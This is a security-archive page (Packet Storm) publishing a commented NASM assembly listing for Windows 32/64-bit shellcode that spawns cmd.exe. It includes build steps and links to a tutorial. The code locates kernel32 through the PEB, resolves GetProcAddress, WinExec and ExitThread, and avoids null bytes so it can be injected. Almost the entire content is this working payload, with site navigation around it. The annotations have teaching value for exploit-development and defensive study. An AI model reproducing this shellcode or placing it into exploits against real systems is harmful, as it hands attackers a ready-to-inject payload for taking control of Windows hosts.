what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Windows 32-bit / 64-bit cmd.exe Shellcode

Microsoft Windows 32-bit / 64-bit cmd.exe Shellcode
Posted May 18, 2017
Authored by Filippo Bersani

718 byte small Microsoft Windows 32-bit/64-bit cmd.exe shellcode.

tags | shellcode
systems | windows
SHA-256 | d22926562b5b0ac2e30ac709b50939384bfa98eedfd49cbd8ba8c5e45f922b67

Microsoft Windows 32-bit / 64-bit cmd.exe Shellcode

Change Mirror Download
;Full tutorial: https://www.zinzloun.info [#Windows CMD shellcode]

;nasm.exe [-f win32] dynamic.asm -o dynamic.obj
;SKIP -f win32 to create the .obj file to extract eventually the hex code
;then execute: [python bin2hex.py dynamic.obj] to get the hex code:


;you can download the python script here: https://github.com/zinzloun/infoSec/blob/master/bin2hex.py

;GoLink.exe /console /entry _start dynamic.obj

;Tested and coded on Win10 Home edition 64, tested also on: Win7 EE 32, Win Srv 2012 R2 64

[BITS 32]

[SECTION .text]
global _start

xor ecx, ecx ; trick to avoid null byte MOV EAX,[FS:0x30], we add ecx
MOV EAX, [FS:ecx+0x30] ; EAX = PEB
MOV EAX, [eax+0x0C] ; EAX = PEB->Ldr
MOV EAX, [EAX+0x1C] ; EAX = PEB->Ldr.InInitializationOrderModuleList.Flink
; Start to move the pointer 2 positions ahead
mov eax, [eax+ecx] ; EAX = LDR 2nd entry -> KernelBA * + ecx to avoid NULL
mov eax, [eax+ecx] ; EAX = LDR 3rd entry -> Kernel32
; End move
MOV EBX, [EAX+8] ; EBX = LDR_MODULE's BaseAddress Kernel32

;Find the EXPORT TABLE of kernel32.dll
mov edx, [ebx + 0x3c] ; EDX = DOS->e_lfanew (offset 60)
add edx, ebx ; EDX = PE Header (1)
mov edx, [edx + 0x78] ; EDX = Offset export table (offset 120)
add edx, ebx ; EDX = Export table (data type IMAGE_EXPORT_DIRECTORY) (2), we will use this value later (*)
mov esi, [edx + 0x20] ; ESI = Relative offset to AddressOfNames
add esi, ebx ; ESI = AddressOfNames (3)

;Find GetProcAddress function name (the ordinal)
inc ecx ; Increment the counter (we start from 1)
; lodsd instruction will follow the pointer specified by the ESI register and set result in the EAX, this means that after the lodsd
; instruction we will have the offset of the current name function in EAX.
; the instruction will also increment the esi register value with 4, so ESI will already point to next function name offset
add eax, ebx ; Get function name (offset + base a)
cmp dword [eax], 0x50746547 ; PteG ->search first 4 bytes of the string GetProcAddre in little-endian format
jnz Find_GetProc
cmp dword [eax + 0x4], 0x41636f72 ; Acor ->other 4 bytes
jnz Find_GetProc
cmp dword [eax + 0x8], 0x65726464 ; erdd ->other 4 bytes. At this point even without checking the last 2 bytes (ss) of the function name we assume it is GetProcAddress
jnz Find_GetProc
dec ecx ; we start counting from 1 but the adrress index start from 0 so we need to decrement ECX
; now ECX points to the array index of AddressOfNames and we can obtain the ordinal value in this way: AddressOfNameOrdinals[ecx] = ordinal

;Find the address of GetProcAddress function
mov esi, [edx + 0x24] ; ESI = Offset to AddressOfNameOrdinals (4)(*)
add esi, ebx ; ESI = AddressOfNameOrdinals
mov cx, [esi + ecx * 2] ; CX (lower word of ECX 16bit) = AddressOfNameOrdinals contains two byte numbers value (the ordinal), so we only need of the lower word of ECX
; CX (16bit == 2byte). This value is the link (the index) to the AddressOfFunctions
; so CX now points to the Number of function (ordinal) that corresponds to the GetProcAddress address value in the AddressOfFunctions
mov esi, [edx + 0x1c] ; ESI = Offset to AddressOfFunctions (5)
add esi, ebx ; ESI = AddressOfFunctions
mov edx, [esi + ecx * 4] ; EDX = Offset to GetProcAddress function address: AddressOfFunctions[ecx*4]
; We set ecx * 4 because each address pointer has 4 bytes reserved and ESI points to the beginning of AddressOfFunctions array
add edx, ebx ; EDX = GetProcAddress

mov esi, edx ; store GetProcAddress in ESI

;Finding address of Winexec calling GetProcAddress(base kernel32,"Winexec\0")
xor ecx,ecx
push ecx
;another trick to avoid null bytes: prefix the Winexec string with A to keep the stack aligned without null
;we load AWinexec
push 0x63657845
push 0x6e695741
mov ecx,esp
lea ecx, [ecx+1] ; get rid of 41(A)
push ecx ; Winexec\0
push ebx ; Base kernel32

call esi ;Call GetProcAddress: the return result is saved in EAX

xchg edi,edx
mov edi, eax;save Winexec address in EDI

;Finding address of ExitThread calling GetProcAddress(base kernel32,"ExitThread\0")
xor ecx,ecx
push ecx
;the same trick used before for WinExec
PUSH 0x64616572
PUSH 0x68547469
PUSH 0x78454141

mov ecx,esp
lea ecx, [ecx+2] ; get rid of 4141(AA)

push ecx ; ExitThread\0
push ebx ; Base kernel32

call esi ;Call GetProcAddress: the return result is saved in EAX
mov esi, eax;save ExitThread address in esi (overwrite GetProcAddress since we don't need anymore)

;Finally call cmd.exe\0
xor ecx,ecx
push ecx
push 0x20657865
push 0x2e646d63

mov ecx,esp ; "cmd.exe \0"
push 0x1 ; windows style
push ecx

call edi ; WinExec("cmd.exe \0",1)

;exit clean
xor ecx,ecx
push ecx
call esi ; ExitThread(0)

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By